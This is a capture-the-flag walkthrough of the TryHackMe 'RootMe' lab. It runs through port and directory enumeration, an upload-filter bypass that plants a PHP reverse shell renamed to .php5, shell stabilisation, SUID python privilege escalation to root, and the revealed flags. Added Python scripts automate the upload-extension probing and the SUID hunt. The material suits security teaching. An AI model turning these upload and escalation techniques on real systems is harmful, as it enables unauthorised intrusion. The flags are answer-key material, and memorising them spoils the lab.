Root me THM
- This is a beginner-level CTF; we will be covering the basics of pentesting: enumeration, getting a shell through an upload form, and privilege escalation.
Type : easy
Deploy the box
- Start the machine and connect our machine to the VPN.
- Once I have the IP of the machine, I add it to my hosts file under the name rootme.thm so I can refer to the box by name:
rio@0xveil:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 0xveil
10.10.87.131 rootme.thm # <- the line I added
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Enumeration
- First I use curl to look at the site. Running
curl -v http://websitename.com
prints the request and response headers as well as the body, so the Server header and any redirects are visible before opening a browser.
rio@0xveil:~$ curl http://rootme.thm
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="css/home.css">
<script src="js/maquina_de_escrever.js"></script>
<title>HackIT - Home</title>
</head>
<body>
<div class="main-div">
<p class="title">root@rootme:~#</p>
<p class="description">
Can you root me?
</p>
</div>
<!-- -->
<script>
const titulo = document.querySelector('.title');
typeWrite(titulo);
</script>
</body>
</html>
# I pipe the page through html2text to read the visible text in the terminal.
rio@0xveil:~$ curl http://rootme.thm | html2text
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 616 100 616 0 0 895 0 --:--:-- --:--:-- --:--:-- 896
root@rootme:~#
Can you root me?
Web Enum.
Whenever I look at a web page I open the developer tools (Ctrl + Shift + I) and check the Network tab: the response headers reveal the server version, and the request list shows the other files the page fetches (here css/home.css and js/maquina_de_escrever.js). Checking
/robots.txt
/sitemap.xml
/.well-known/security.txt
is good practice during web enum. Requesting
/index.php
and /index.html
tells us which one the server actually serves, which hints at the backend technology (index.php answers here, so the site is PHP). Viewing the page source (Ctrl + U) also exposes more about the page. There are more tools and browser add-ons that fingerprint the technology behind a page.
Server -> Apache/2.4.29 (Ubuntu)
Ports hunting
- For port hunting I use nc and nmap.
- With nc I connect to the default ports (ssh, ftp, http, etc.) and read the banner to learn the version the service is running.
- With nmap I first sweep all ports with a high packet rate to find the open ones, then run a version scan against just those ports.
rio@0xveil:~$ sudo nmap --min-rate=1000 -p- rootme.thm
Nmap scan report for rootme.thm (10.10.87.131)
Host is up (0.33s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 125.00 seconds
rio@0xveil:~$ sudo nmap -p 22,80 -sV rootme.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-29 05:52 EST
Nmap scan report for rootme.thm (10.10.87.131)
Host is up (0.45s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
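The nc banner-grab step described above, written out as a small socket script. This is an added example and not code from the original writeup; the two sample banners embedded below are constructed to match what nmap reported for this box (OpenSSH 7.6p1 on 22, Apache 2.4.29 on 80), and the host name rootme.thm is the one from the hosts file.

```python
#!/usr/bin/env python3
"""Banner grabbing by hand: connect, read what the service says first,
and parse the version out of it. SSH greets first; HTTP only answers
once asked, so a HEAD request is sent on web ports."""
import re
import socket
import sys

HTTP_PORTS = {80, 8000, 8080}

# Constructed samples (not captured from the box) that mirror nmap's findings.
SAMPLE_SSH_BANNER = "SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3\r\n"
SAMPLE_HTTP_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Sun, 29 Jan 2023 10:52:00 GMT\r\n"
    "Server: Apache/2.4.29 (Ubuntu)\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
)


def parse_ssh_banner(banner):
    """SSH-<protoversion>-<softwareversion> [comments] (RFC 4253 section 4.2).
    Returns (protocol, software, comment), or None if this is not SSH."""
    m = re.match(r"SSH-(\d+\.\d+)-(\S+)(?:\s+(.*))?", banner.strip())
    if not m:
        return None
    return m.group(1), m.group(2), m.group(3) or ""


def parse_http_headers(raw):
    """Return (status_code, {lowercased header name: value}) from a raw
    response head; the body, if any, is ignored."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers


def grab_banner(host, port, timeout=5.0):
    """Read the service banner. For HTTP ports ask with HEAD first and read
    up to the end of the headers; for everything else read one line."""
    want = b"\r\n\r\n" if port in HTTP_PORTS else b"\n"
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        if port in HTTP_PORTS:
            s.sendall(f"HEAD / HTTP/1.1\r\nHost: {host}\r\n"
                      "Connection: close\r\n\r\n".encode())
        data = b""
        try:
            while want not in data:
                chunk = s.recv(4096)
                if not chunk:
                    break
                data += chunk
        except socket.timeout:
            pass  # return whatever arrived before the timeout
    return data.decode(errors="replace")


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "rootme.thm"
    for port in (22, 80):
        try:
            banner = grab_banner(host, port)
        except OSError as e:
            print(f"{port}/tcp: {e}")
            continue
        if port == 22:
            print(f"22/tcp: {parse_ssh_banner(banner)}")
        else:
            print(f"80/tcp: Server = {parse_http_headers(banner)[1].get('server')}")
```

Run it as `python3 banner.py rootme.thm`; the parsed tuple for port 22 gives the exact OpenSSH build string that nmap's -sV later confirmed, which is what you feed into a CVE search.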
Dir Hunting
There are many tools for directory hunting. I use ffuf (Fuzz Faster U Fool), one of my favourite tools in my arsenal, with the dirb common wordlist:
rio@0xveil:~$ ffuf -w /usr/share/wordlists/dirb/common.txt -c -u http://rootme.thm/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://rootme.thm/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
.htaccess [Status: 403, Size: 275, Words: 20, Lines: 10, Duration: 293ms]
.hta [Status: 403, Size: 275, Words: 20, Lines: 10, Duration: 295ms]
[Status: 200, Size: 616, Words: 115, Lines: 26, Duration: 394ms]
.htpasswd [Status: 403, Size: 275, Words: 20, Lines: 10, Duration: 394ms]
css [Status: 301, Size: 306, Words: 20, Lines: 10, Duration: 318ms]
index.php [Status: 200, Size: 616, Words: 115, Lines: 26, Duration: 397ms]
js [Status: 301, Size: 305, Words: 20, Lines: 10, Duration: 313ms]
panel [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 299ms]
server-status [Status: 403, Size: 275, Words: 20, Lines: 10, Duration: 304ms]
uploads [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 386ms]
:: Progress: [4614/4614] :: Job [1/1] :: 63 req/sec :: Duration: [0:00:46] :: Errors: 0 ::
- ffuf found several paths; we can check them one by one. css and js are the assets referenced in the source, server-status is Apache's status page (403, denied to us), and
/panel
next to /uploads looks interesting: an upload form beside a directory that serves the uploaded files is a classic route to code execution.
Exploitation
- /panel gives us a form to upload a file, and /uploads is where the uploaded files are stored and served from. So we can upload a PHP file and then request it from
/uploads
to make the web server execute it.
- PHP reverse shell: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
- Change the IP and port in the script to our VPN IP and the port our listener will use.
- Uploading the file as
.php
is rejected: the form filters on the extension. The check is only a blacklist of the .php extension, so renaming the payload to payload.php5 gets it through, and Apache on this box still executes .php5 as PHP.
- We could do the renaming with Burp or any other intercepting proxy, but for now it's not worth it.
- Start an nc listener on the chosen port, then go to
/uploads
and click payload.php5; the server runs the script and it connects back to us.
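The upload-and-rename loop above, automated, as an added example that is not part of the original writeup. The form field name ("fileToUpload"), the form action (/panel/) and the idea that uploads land directly under /uploads/<name> are assumptions to confirm from the page source before running; only /panel and /uploads themselves come from the ffuf output. It uploads a harmless probe first, so the file is confirmed to execute (and not just be served as text) before the real reverse shell goes up, and it shows the weak blacklist check beside the allowlist check that would have stopped this.

```python
#!/usr/bin/env python3
"""Try each alternative PHP extension against the upload form and report
which ones are accepted AND executed. Uses only the standard library."""
import urllib.error
import urllib.request
import uuid

PANEL_URL = "http://rootme.thm/panel/"      # assumption: form action
UPLOADS_URL = "http://rootme.thm/uploads/"  # /uploads was found by ffuf
FIELD_NAME = "fileToUpload"                 # assumption: name of the file input

# Extensions Apache's PHP handler is commonly configured to run. Which ones
# actually execute is decided by the server's AddHandler/FilesMatch config,
# not by the upload form; on this box .php5 worked.
CANDIDATE_EXTS = ["php", "phtml", "php3", "php4", "php5", "phar"]


def candidate_names(base, exts=CANDIDATE_EXTS):
    """base.php, base.phtml, ... in the order we want to try them."""
    return [f"{base}.{e}" for e in exts]


def blacklist_check(filename):
    """Model of the weak check this box appears to use: reject only an
    extension that is exactly 'php'. Returns True when accepted."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext != "php"


def allowlist_check(filename, allowed=("png", "jpg", "jpeg", "gif")):
    """The fix: accept only a short allowlist, and require exactly one
    extension so names like shell.php.png are rejected as well."""
    parts = filename.split(".")
    return len(parts) == 2 and parts[0] != "" and parts[1].lower() in allowed


def probe_payload(marker):
    """Harmless PHP. If the marker comes back in the body the file ran."""
    return f"<?php echo 'PROBE-{marker}'; ?>".encode()


def build_multipart(field, filename, content, boundary=None):
    """Hand-rolled multipart/form-data body with a single file part."""
    boundary = boundary or "----" + uuid.uuid4().hex
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode() + content + f"\r\n--{boundary}--\r\n".encode()
    return body, f"multipart/form-data; boundary={boundary}"


def upload(filename, content):
    """POST the file to the panel; returns the HTTP status code."""
    body, ctype = build_multipart(FIELD_NAME, filename, content)
    req = urllib.request.Request(PANEL_URL, data=body, headers={"Content-Type": ctype})
    try:
        with urllib.request.urlopen(req, timeout=10) as r:
            return r.status
    except urllib.error.HTTPError as e:
        return e.code


def executed(filename, marker):
    """GET the uploaded file and look for the marker: executed, not served."""
    try:
        with urllib.request.urlopen(UPLOADS_URL + filename, timeout=10) as r:
            return f"PROBE-{marker}" in r.read().decode(errors="replace")
    except urllib.error.HTTPError:
        return False


if __name__ == "__main__":
    marker = uuid.uuid4().hex[:8]
    for name in candidate_names("probe_" + marker):
        status = upload(name, probe_payload(marker))
        print(f"{name}: upload HTTP {status}, executes={executed(name, marker)}")
```

Once a candidate prints `executes=True`, upload the pentestmonkey shell under that same extension. The probe-first approach also keeps the uploads directory from filling with dead reverse shells that a defender would find later.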
Shell Stabilizing
┌──(rio㉿0xveil)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.9.6.58] from (UNKNOWN) [10.10.87.131] 41778
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
10:59:37 up 14 min, 0 users, load average: 0.00, 0.37, 0.65
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@rootme:/$ ^Z # Ctrl + z to go in background.
zsh: suspended nc -lvnp 1234
┌──(rio㉿0xveil)-[~]
└─$ stty raw -echo;fg # raw -echo stops our local terminal from interpreting keystrokes (so Ctrl+C, arrows and tab go to the remote pty instead), and fg brings nc back to the foreground.
[1] + continued nc -lvnp 1234
^C
www-data@rootme:/$ ^C
www-data@rootme:/$ export TERM=xterm
www-data@rootme:/$
www-data@rootme:/$
# Now Ctrl+C terminates the running command inside the shell instead of killing the listener. If line wrapping is off, set the size by hand: stty rows <N> cols <M>, using the values from "stty size" in a local terminal.
User flag
- The user flag is inside the
/var/www/
directory: THM{y0u_g0t_a_sh3ll}
Privilege Escalation
- For priv esc we first look for SUID binaries owned by root that we are allowed to execute:
find / -user root -perm -u=s 2>/dev/null
This lists files owned by root with the setuid bit set; each of them runs with root's effective uid no matter who launches it, and 2>/dev/null hides the permission-denied noise.
- In the list,
python
stands out: it is not normally SUID. Checking it on
GTFOBINS
https://gtfobins.github.io/gtfobins/python/
there is a SUID entry: python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
The -p flag matters: without it sh drops the effective uid 0 back to the real uid (www-data) at start-up. With it, this command gives us a root shell.
www-data@rootme:/home/test$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
# whoami
root
# cd /root
# ls
root.txt
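The SUID hunt from the Privilege Escalation section, done in Python instead of find, with a filter that flags the binaries worth looking up on GTFOBins. This is an added example, not code from the writeup or from GTFOBins; GTFOBINS_SUID is a hand-picked subset of the GTFOBins SUID list and is an assumption to extend as needed. The sandbox fixture at the end is a constructed way to try the finder without root (the fake file is owned by us, so search with uid=os.getuid()).

```python
#!/usr/bin/env python3
"""Find setuid binaries owned by a given uid (root by default), then flag
the ones GTFOBins knows how to abuse, and print the one-liner for python."""
import os
import re
import stat
import tempfile

# Subset of https://gtfobins.github.io/ SUID entries (assumption: extend it).
GTFOBINS_SUID = {"python", "perl", "bash", "find", "vim", "env", "nmap", "cp", "awk"}

# Pseudo filesystems that only add noise and time.
SKIP_PREFIXES = ("/proc", "/sys", "/dev", "/run")


def suid_owned_by(st_mode, st_uid, uid=0):
    """Regular file, setuid bit set, owned by `uid`: the same predicate as
    `find -user root -perm -u=s` when uid is 0."""
    return stat.S_ISREG(st_mode) and bool(st_mode & stat.S_ISUID) and st_uid == uid


def _skipped(dirpath):
    return any(dirpath == p or dirpath.startswith(p + "/") for p in SKIP_PREFIXES)


def find_suid(root="/", uid=0):
    """Walk `root` and return sorted paths of setuid files owned by `uid`."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        if _skipped(dirpath):
            dirnames[:] = []  # prune the walk
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: judge the file, not a symlink target
            except OSError:
                continue  # unreadable entries are the 2>/dev/null of find
            if suid_owned_by(st.st_mode, st.st_uid, uid):
                hits.append(path)
    return sorted(hits)


def base_tool(path):
    """python2.7 -> python, perl5.26 -> perl: strip a trailing version."""
    return re.sub(r"[\d.]+$", "", os.path.basename(path))


def interesting(paths):
    """Keep the hits whose tool name has a GTFOBins SUID entry."""
    return [p for p in paths if base_tool(p) in GTFOBINS_SUID]


def suid_shell_command(python_path):
    """The GTFOBins one-liner used on this box. sh -p keeps the effective
    uid (root) instead of resetting it to the real uid at start-up."""
    return f"""{python_path} -c 'import os; os.execl("/bin/sh", "sh", "-p")'"""


def make_sandbox():
    """Constructed fixture: a temp dir with one file carrying the setuid bit,
    owned by the current user, for trying find_suid() without root."""
    d = tempfile.mkdtemp(prefix="suid-demo-")
    p = os.path.join(d, "fake-suid")
    open(p, "w").close()
    try:
        os.chmod(p, 0o4755)  # chmod after writing: a non-root write clears the bit
    except OSError:
        pass
    return d, p


if __name__ == "__main__":
    found = find_suid("/", uid=0)
    for p in found:
        print(p)
    for p in interesting(found):
        print("GTFOBins candidate:", p, "->", suid_shell_command(p))
```

On a normal Ubuntu host the "interesting" list should be empty; a SUID python, perl or bash is almost always a planted or accidental misconfiguration, and the fix is simply `chmod u-s` on that binary.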
Root flag
THM{pr1v1l3g3_3sc4l4t10n}